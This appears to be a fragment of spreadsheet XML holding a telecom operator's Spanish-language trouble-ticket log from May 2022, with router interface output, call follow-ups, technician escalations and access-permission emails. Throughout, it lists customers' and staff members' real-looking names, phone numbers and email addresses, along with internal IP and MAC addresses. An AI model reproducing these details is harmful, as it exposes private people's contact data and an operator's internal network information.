INTERNET  10.81.80.1              0   183D.5E29.6845  ARPA   GIGABITETHERNET2.2325
INTERNET  10.81.80.12             -   0045.1DBB.30C5  ARPA   GIGABITETHERNET2.2325
INTERNET  192.168.15.1            -   0045.1DBB.30C0  ARPA   VLAN1
INTERNET  192.168.15.2            0   CC2D.2115.9FD9  ARPA   VLAN1
1539667_CSC867_DA-GAS-COMAYAGUA_COM01_DT10MB#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            UP             UP       LAN_DATOS
FA1                            DOWN           DOWN     LAN_VIDEOSEGURIDAD
FA2                            DOWN           DOWN
GI0                            DOWN           DOWN
GI1                            DOWN           DOWN
GI2                            UP             UP
GI2.2325                       UP             UP       GESTION
GI2.3000                       UP             UP       /_/1539667/_/DT10MB_DA-GAS-COMAYGUA_COM01
VL1                            UP             UP       LAN_DATOS
VL2                            UP             UP       LAN_VIDEOSEGURIDAD</t>
  </si>
  <si>
    <t>F4566259</t>
  </si>
  <si>
    <t>SERVICIO UP- SE HA HABLADO CON CLIENTE GRISELDA DE RENDEROS-74145244 NOS COMENTA QUE EL PROBLEMA ES ENTRE CORTE DE LLAMADAS/PERDIDA DE AUDIO. SE LE COMENTA QUE TENEMOS FALLA MASIVA ##CLIENTE QUEDA ENTERADO ##VIVO</t>
  </si>
  <si>
    <t>F4566262</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION CENTRAL				07:0
	WO OPEN                        		12	7:20
1/4	MIGUEL ANGEL CALDERON	58261558	2 HORAS	9:20:00
2/4	MIGUEL ANGEL CALDERON	58261558	3 HORAS	10:20:00
3/4	RENE AGUSTIN	58261183	5 HORAS	11:20:00
4/4	RODOLFO MORALES	58261609	6 HORAS	13:20:00</t>
  </si>
  <si>
    <t>TECNICO EN SITIO VALIDANDO CONEXIONES FISICAS, POSIBLEMENTE DAÑO EN PATCHCORD</t>
  </si>
  <si>
    <t>NO SE TIENE COMUNICACION CON CTC DE NODO DESDE ETX PUERTO SE VE UP, TECNICO VE LINK DE FIBRA , PERO L3 NO RESPONDE NI IP DE GESTION NI WAN DE SERRVICIO</t>
  </si>
  <si>
    <t>ENLACE ACTIVO SE CAMBIA PATCHCORD Y NEGOCIACION SE DETIENE ESCALACION</t>
  </si>
  <si>
    <t>F4566264</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMA COMPLETA.
SE VALIDA EL SERVICIO CON EL CLIENTE KARLA GIRON.
2001986974
COLA:
NOMBRE: A: 22452500
NÚMERO: 22452500
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 22452500
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 15:36:17</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ENRIQUE RODAS 50510452, QUIEN COMENTA QUE YA HAY TÉCNICO DE CLARO EN SITIO REALIZANDO REPARACIÓN DE LA FIBRA, INDICA QUE REPORTÓ TAMBIÉN SU SERVICIO DE INTERNET. 2001940461</t>
  </si>
  <si>
    <t>F4566274</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE MARCO, CL COMENTA QUE YA REALIZO DESCARTES DE PRIMER NIVEL, COMENTA QUE NO TIENE LINK DE FO, SE DEJA EN CONFERENCIA CON ESAU SANDOVAL PARA VERIFICAR COMO SE VA A PROCEDER
TOMAR EN CUENTA QUE SE LLEVAN 2 FALLAS DEL MISMO SITIO F4566279 / F4566274</t>
  </si>
  <si>
    <t>F4566278</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE  JORGE LOPEZ INDICANDO QUE LA SEÑORITA LILIANA NO SE ENCUENTRA EN SITIO, CLIENTE NOS DESCRIBE EL PROBLEMA QUE ESTAN PRESENTANDO INDICA QUE CUANDO  RECIBEN LLAMADAS SE TIENEN CORTES O INTERFERENCIA, SE MEZCLAN LOS AUDIOS ENTRE OTRAS EXTENSIONES, SE LE EXPLICA AL CLIENTE QUE ACTUALMENTE SE TIENE FALLA EN EL SERVICIO DE TELEFONIA, CLIENTE QUEDA ENTERADO ACERCA DE LA AFECTACION
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566279</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ROJAS 55312227 PARA BRINDAR RETROALIMENTACION, CLIENTE SOLICITO LOS DATOS DE PERSONAL TECNICO Y SE LE BRINDAN A CLIENTE POR LLAMADA
-ID 2001936550 - 2001939302</t>
  </si>
  <si>
    <t>F4566284</t>
  </si>
  <si>
    <t>SE LLAMA JAIME CASTILLO-25202004 -- SE TIENE EN LINEA- ##  COMENTA QUE  O QUE REPORTA ES VOZ ROBOTIZADA + INTEREFERENCIA- SE LE IDNICA QUE SE TIENE UNA FALLA MASIVA Y VARIOS CLIENTE AFECTADOS- ##QUEDA ENTERADO</t>
  </si>
  <si>
    <t>F4566288</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CESAR SANTOS AL 55160920 SE BRINDA RETROALIMENTACION **
ID 2001955565
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR SANTOS 55160920 MENCIONA QUE AUN ESTA PERSONAL TECNICO EN SITIO, SE LLAMARA EN 10 MIN
-ID 2001980482</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE CESAR SANTOS 55160920 ID: 2001930437, SE DEJA EN CONFERENCIA CON FRANCISCO QUEZADA PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4566296</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EDWIN JACINTO 56955986 INDICA QUE YA TIENE LLAMADAS, PERO ESTA REALIZANDO PRUEBAS, SOLICITA QUE SE LE CONTACTE A LAS 16:30 HORAS
2001951659
COLA:
NOMBRE: A: 56955986
NÚMERO: 56955986
ESTADO: CONECTADA
DURACIÓN: 0:00:41
DETALLES: 56955986
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 17/05/2022 13:50:19</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN JACINTO 56955986 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001007642</t>
  </si>
  <si>
    <t>F4566299</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO, CONSULTA SOBRE PERMISOS, SE LE COMENTA QUE EN ESTE MOMENTO UNICAMENTE  ESTAN LOS DE LA AGENCIA, AUN NO ESTAN LOS DEL INGNEIO- ## TECNICO QUEDA ENTERADO + SE LLAMAA  CLEINTE E INDICA QUE APROX EN MEDIA HORA YA ESTARIAN LOS PERMISOS, SE LLAMARA EN 30 MINUTOS PARA CONFIRMAR ##
3001071531
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 41199982
NÚMERO: 41199982
DURACIÓN: 0:08:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41199982
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 08:48:08
3001071531
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 41199982
NÚMERO: 41199982
DURACIÓN: 0:08:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 41199982
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 08:50:02</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LUIS LIMA, QUIEN VALIDA Y AUTORIZA EL CIERRE.
3001976344
COLA:
NOMBRE: A: 56955969
NÚMERO: 56955969
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 56955969
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/05/2022 14:57:53</t>
  </si>
  <si>
    <t>SE ENVIO CORREO SOLICITANDO LOS PERMISOS AL CLIENTE.
NOTA TAMBIEN TIENEN QUE TRAMITAR LOS PERMISOS AL INGENIO.
SE DARA SEGUIMIENTO EL DIA DE MAÑANA.
DE: HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 18:01
PARA: TELEFONIACORPT@BI.COM.GT &lt;TELEFONIACORPT@BI.COM.GT&gt;; LLIMA@AGENCIASBI.COM.GT &lt;LLIMA@AGENCIASBI.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SD1126396 BANCO INDUSTRIAL INGENIO PANTALEON GDN 77939400
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SOLICITO SU APOYO CON EL INGRESO A LOS TÉCNICOS A SUS INSTALACIONES Y TAMBIÉN CON EL APOYO
AL INGRESO A LOS TÉCNICOS A INGENIO.
ADJUNTO ARCHIVO CON LOS DATOS DE LOS TÉCNICOS ASIGNADOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS LIMA-56955969   CONFIRMA QUE YA ESTAN LOS PERMISOS- ##
3001093303
COLA:
NOMBRE: A: 56955969
NÚMERO: 56955969
DURACIÓN: 0:00:51
ESTADO: CONECTADA
DETALLES: 56955969
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 09:37:49</t>
  </si>
  <si>
    <t>SE HA LLAMADO A TEC, NOS COMENTA QUE ENCONTRO LA ##ANTENA QUEMADA ## POR LOQ UE ESTA EL CILENTE SOLICITANDO PERMISOS EN ALTURA, COMENTA QUE SE ESTA A LA ESPERA DE PERMISOS ##</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A LA CENTRAL PARA QUE NOS APOYEN CON PERMISOS ##EN ESPERA
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 13:06
PARA: PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GILBER DAVID MACARIO RETANA &lt;GMACARIO@BI.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; TELEFONIACORPT@BI.COM.GT &lt;TELEFONIACORPT@BI.COM.GT&gt;; LLIMA@AGENCIASBI.COM.GT &lt;LLIMA@AGENCIASBI.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SD1126396 BANCO INDUSTRIAL INGENIO PANTALEON GDN 77939400
BUENA TARDE ESTIMADOS, SOLICITO NUEVAMENTE APOYO PARA EL TRÁMITE DE PERMISOS HACIA NUESTROS TÉCNICOS PARA EL DÍA DE MAÑANA  19/05 EN LA AGENCIA. ACTUALMENTE YA SE TIENEN LOS PERMISOS POR PARTE DEL INGENIO PARA SEGUIR TRABAJANDO EL DÍA DE MAÑANA, POR LO QUE SOLICITO NUEVAMENTE APOYO PARA LA GESTIÓN DE ACCESOS HACIA LOS MISMOS TÉCNICOS.
GRACIAS POR EL APOYO, QUEDO ATENTA A SUS COMENTARIOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE LUIS LIMA-56955969  ## COMETNA QUE YA TIEENE LA AUTORIZACION DE PERMISOS PARA TRABAJAR EN LAS ALTURAS, ## PERMISOS PARA MAÑANA A LAS 10 AM ##
3001169945
COLA:
NOMBRE: A: 56955969
NÚMERO: 56955969
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 56955969
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 12:50:07</t>
  </si>
  <si>
    <t>SE PROCEDE A PEDIR NUEVAMENTE PERMISOS PARA NUESTROS TECNICOS PARA LA AGENCIA ##</t>
  </si>
  <si>
    <t>SE LLAMAA TEC OMAR 41199982 SE LE INFORMA QUE YA ESTAN LOS PERMISOS PARA LA AGENCIA Y PARA TRABAJAR EN LAS ALTURAS DEL INGENIO- QUEDA ENTERADO + NOS COMENTA QUE YA TIENE LOS REPUESTOS PARA REALIZAR MAÑANA LA INTERVENCION
## SEGUIMIENETO MAÑANA 10 AM ##VIVO</t>
  </si>
  <si>
    <t>##SE RETOMA TICKET EL DIA DE MAÑANA A LAS 10 AM ## YA ESTAN LOS PERMISOS AUTORIZADOS TANTO EN EL INGENIO COMO EN LA AGENCIA ##</t>
  </si>
  <si>
    <t>F4566304</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL CLIENTE OMAR ROMERO 78536075 INDICANDO QUE AUN PERSISTE EL PROBLEMA DE CORTES DE LLAMADAS Y QUE AHORA ESTA PRESENTANDO TAMBIEN CRUCE DE AUDIOS, SE LE INDICA QUE SE ESTA TENIENDO PROBLEMAS A NIVEL GENERAL Y QUE YA LO ESTAMOS VALIDANDO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566315</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROGER RAMOS 31904156 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001970839</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROGER RAMOS AL 3190-4156 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001991602
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROGER RAMOS 31904156 SUENA DESCONECTADO, SE INTENTARA LUEGO
-ID 2001999531</t>
  </si>
  <si>
    <t>F4566316</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROGER RAMOS 31904156 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 3001020484</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROGER RAMOS AL 3190-4156 NO RESPONDE, DA TONO DE DESCONECTADO || SE INTENTARA LUEGO **
ID 3001009409
**</t>
  </si>
  <si>
    <t>F4566320</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXIS RIVERA-72198813  - NO SE PUDO ESTABLECER LA LLAMDA, CLIENTE NO NOS ESCUCHA- SE INTENTARA LUEGO
3001086080
COLA:
NOMBRE: A: 0050372198813
NÚMERO: 0050372198813
DURACIÓN: 0:00:21
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050372198813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 09:20:29
RESULTADO: LLAMADA HECHA
NOMBRE: 0050372198813
NÚMERO: 0050372198813
INICIO: HOY, 09:17
FIN: HOY, 09:17
DURACIÓN: 0:09
ID DE LLAMADA: 3001085685
RESULTADO: LLAMADA HECHA
NOMBRE: 0050372198813
NÚMERO: 0050372198813
INICIO: HOY, 09:16
FIN: HOY, 09:17
DURACIÓN: 1:06
ID DE LLAMADA: 3001085333
RESULTADO: LLAMADA HECHA
NOMBRE: 0050325252400
NÚMERO: 0050325252400
INICIO: HOY, 09:09
FIN: HOY, 09:09
DURACIÓN: 0:07
ID DE LLAMADA: 3001082444</t>
  </si>
  <si>
    <t>NO SE PUEDE ESTABLECER LLAMADA CON CLIENTE ALEXIS RIVERA-72198813, NIPERSONAL DE CONTACT PUDO LOCALIZARLE + INDICAN QUE NO SABEN NADA SOBRE REPORTE
3001126950
COLA:
NOMBRE: A: 0050372198813
NÚMERO: 0050372198813
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 0050372198813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 11:01:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXIS RIVERA-72198813   ENVIA DIRECTO A BUZON ##SE INTENTARA NUEVAMENTE EN BREVE ##VIVO
3001104171
COLA:
NOMBRE: A: 0050372198813
NÚMERO: 0050372198813
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050372198813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:04:45
3001104171
COLA:
NOMBRE: A: 0050372198813
NÚMERO: 0050372198813
DURACIÓN: 0:00:27
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050372198813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:05:25
3001104325
COLA:
NOMBRE: A: 0050372198813
NÚMERO: 0050372198813
DURACIÓN: 0:00:21
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050372198813
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:05:41</t>
  </si>
  <si>
    <t>SE LLAMA  AL GDN 22342300  CONTESTA SEÑORITA  CINTHIA--  ##NOS MANTENEMOS EN LINEA
3001122361
COLA:
NOMBRE: A: 0050322342300
NÚMERO: 0050322342300
DURACIÓN: 0:02:41
ESTADO: CONECTADA
DETALLES: 0050322342300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 18/05/2022 10:52:40</t>
  </si>
  <si>
    <t>F4566334</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAIRY QUECEDO 98437053 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001971958</t>
  </si>
  <si>
    <t>SE TUVO LLAMADA DE HN SE ESTARIA APOYANDO A REALIZAR PRUEBAS PERO CLIENTE SOLICITA LLAMADA EN 30 MINUTOS YA QUE TUVO PROBLEMAS DE ENERGIA
NOTA: EN CRONO INDICA QUE NO SE TIENE CONEXION ENTRE  RADWIN CLIENTE - ROUTER, POSIBLEMENTE NO SE TENGA BIEN CONECTADO CABLE DE RED O EQUIPO ROUTER SE ENCUENTRE APAGADO.</t>
  </si>
  <si>
    <t>F4566343</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO PERMISOS DE ACCESO PARA PERSONAL TECNICO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 17 DE MAYO DE 2022 14:32PARA: CIDMANAGUA@MINED.GOB.NI &lt;CIDMANAGUA@MINED.GOB.NI&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CNOC NICARAGUA &lt;CNOC.CLARO@CLARO.COM.NI&gt;ASUNTO:
BUENAS TARDES ESTIMADO CLIENTE,
COMO PARTE DEL SEGUIMIENTO AL REPORTE REALIZADO DEL ENLACE MINED CENTRO ESCOLAR RUBEN DARIO 1 TIPITAPA CON ID 5610309 SE SOLICITÓ GESTIONAR PERMISO DE ACCESO PARA EL PERSONAL QUE ATENDERÍA LA FALLA, POR LO QUE SE PROCEDE A ADJUNTAR EL NOMBRE DE LOS TÉCNICOS ASIGNADOS A LA ATENCIÓN DE LA MISMA. FAVOR INDICAR POR ESTE MEDIO AL MOMENTO DE ESTAR AUTORIZADOS LOS PERMISOS. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
TÉCNICOS ASIGNADOS.
MARIO ARRIAZA
LUIS RODRIGUEZ
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4566355</t>
  </si>
  <si>
    <t>SE LLAMA A HANS 58266951 (EJECUTIVO) PARA VALIDAR SI CUENTA CON FECHA Y HORA EN LA QUE SE ESTARIA REALIZANDO MEET SIN EMBARGO NO RESPONDE ENVIA A BUZON</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE-- CON EVIDENCIAS-
826900011T - SD1126411 || INTECAP-</t>
  </si>
  <si>
    <t>SE ESCALÓ CON HANS GODÍNEZ/EJECUTIVO CLARO 58266951 INDICA QUE HABÍAN QUEDADO CON CLIENTE REALIZAR PRUEBAS EN CONJUNTO MAÑANA VIERNES A LAS 10:00AM, PERO PIDE SE LE LLAME A LAS 18:00 HORAS DE HOY PARA VALIDAR LO DICHO, PUES CLIENTE AÚN NO LO CONFIRMA.</t>
  </si>
  <si>
    <t>F4566367</t>
  </si>
  <si>
    <t>F4566372</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001072224
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 NO RESPONDE, ENVIA A  BUZON SE INTENTARA LUEGO**
ID 2001990598
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO GARCÍA 33693809 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001002697</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE LLAMÓ A CLIENTE 33693809 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001101736
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001122952
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 SIGUE SIN RESPONDER SOLO CUENTA CON 1 REF., ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001150601
**</t>
  </si>
  <si>
    <t>-*- SE HABLA CON RAQUEL APARICIO 41518650 (CLIENTE) INFORMA QUE DETECTARON UN INCONVENIENTE INTERNO, DE MOMENTO TODO OK, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO GARCIA AL 33693809 SIGUE SIN RESPONDER SOLO CUENTA CON 1 REF., ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001169278
**</t>
  </si>
  <si>
    <t>F4566380</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CHACÓN 79878035 RESPONDE EJEUTIVO Y MENCIONA QUE EL NUMERO DE SONIA CHACÓN ES 75314937
-ID 3001070922</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CHACÓN 75314937 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001131086 - 3001131686</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CHACÓN 75314937 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
CLIENTE MENCIONA QUE FUE INCONVENIENTE INTERNO
-ID 3001232127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SONIA CHACÓN 75314937 MENCIONA QUE ESTAN DESCARTANDO INCONVENIENTE CON UN EQUIPO INTERNO POR LO QUE SOLICITA LLAMADA A LAS 11:00 HRS
-ID 3001071816</t>
  </si>
  <si>
    <t>F4566385</t>
  </si>
  <si>
    <t>AUN NO SE TIENE RESPUESTA POR PARTE DEL CLIENTE
 GESTION DE PERMISOS || 8901246T || 19 AVENIDA 3-60 SECTOR B6 LOCAL COMERCIAL SAN CRISTOBAL ZONA 8 DE MIXCO || BANCO DE DESARROLLO RURAL, S.A.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001008191
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 51809335 NO CONTESTA; LA CENTRAL 57081768 TAMPOCO LO HACE; SE DEBE INTENTAR MÁS TARDE O BIEN HASTA EL DÍA DE MAÑANA A LAS 08:00AM: TICKET APERTURADO A SOLICITUD DE CONTROL DE CAMBIOS CLARO.</t>
  </si>
  <si>
    <t>F4566396</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATAN SANCHEZ 55478801 PARA SOLICITAR LA DIRECCION DE PR
-ID 3001005475
UBICACIÓN: KILOMETRO 21.5 CARRETERA AL SALVADOR IGLESIA CRISTIANA CASA DE DIOS</t>
  </si>
  <si>
    <t>TECNICO IVAN INDICA  QUE PASARAN PRIMERO A LA CENTRAL A REVISAR DESPUES SE MOVILIZARAN HACIA EL CLIENTE. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4566398</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE (52) 55 51 74 52 99 MENCIONA QUE EL INCIDENTE INTERNO YA ESTA CERRADO
-ID 3001072783</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL (52) 55 51 74 52 99 CONTESTA EL SEÑOR ROBERTO GARCIA INDICA QUE ESTARA VALIDANDO Y NOS ESTARA RESPONDIENDO VIA CORREO **
ID 2001988125
**</t>
  </si>
  <si>
    <t>F4566406</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
2001991832
COLA:
NOMBRE: A: 22086000
NÚMERO: 22086000
DURACIÓN: 0:00:05
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22086000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 15:49:40
SE LLAMA AL CLIENTE MARIA BARRIOS 22086000 CONFIRMA QUE YA TIENE LLAMADAS, SE PROCEDE AL CIERRE DEL TICKET
2001989093</t>
  </si>
  <si>
    <t>F4566407</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OSCAR BODEGA 3084 3816 INFORMA QUE PERSONAL TECNICO DE CLARO LE CONFIRMO QUE MAÑANA MIERCOLES LLEGARA EN EL TRANSCURSO DEL DIA CON NUEVO REPUESTO, YA QUE EL REPUESTO QUE INSTALARON HOY SE SOBRECALENTO Y NUEVAMENTE SE DAÑO, NO ES NECESARIO PERMISOS ADICIONALES. ID: 2001960689.</t>
  </si>
  <si>
    <t>F4566412</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WALTHER ORELLANA 22121867 / 22121866
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566417</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLANCA 45132676 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001001846
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLANCA AL 45132676 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001986793
**</t>
  </si>
  <si>
    <t>SE HABLÓ CON JAISON RECINOS/CLIENTE 54892327 INDICA QUE AÚN NO ALCANZA EL EQUIPO CLARO; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE; VÍA TELEFÓNICA GESTOR N1 ASIGNADO INDICA QUE VERIFICARÁ Y DEVOLVERÁ LLAMADA A CLIENTE.
 A NIVEL DE CLARO ENLACE OK</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BLANCA 45132676 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001003444</t>
  </si>
  <si>
    <t>F4566423</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE GESTIÓN N1 DE LO DICHO EN CRONO ANTERIOR, SE HACE DE NUEVO RECORDATORIO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4566458</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRENDA / 88549168 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001069350</t>
  </si>
  <si>
    <t>F4566462</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JOHANNA 22319100 QUIEN INDICA QUE TIENE LLAMADAS CON INTERFERENCIA Y CORTES DE LLAMADAS, SE LE INDICA QUE EL SERVICIO SE ENCUENTRA AFECTADO POR FALLA GENERAL
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566466</t>
  </si>
  <si>
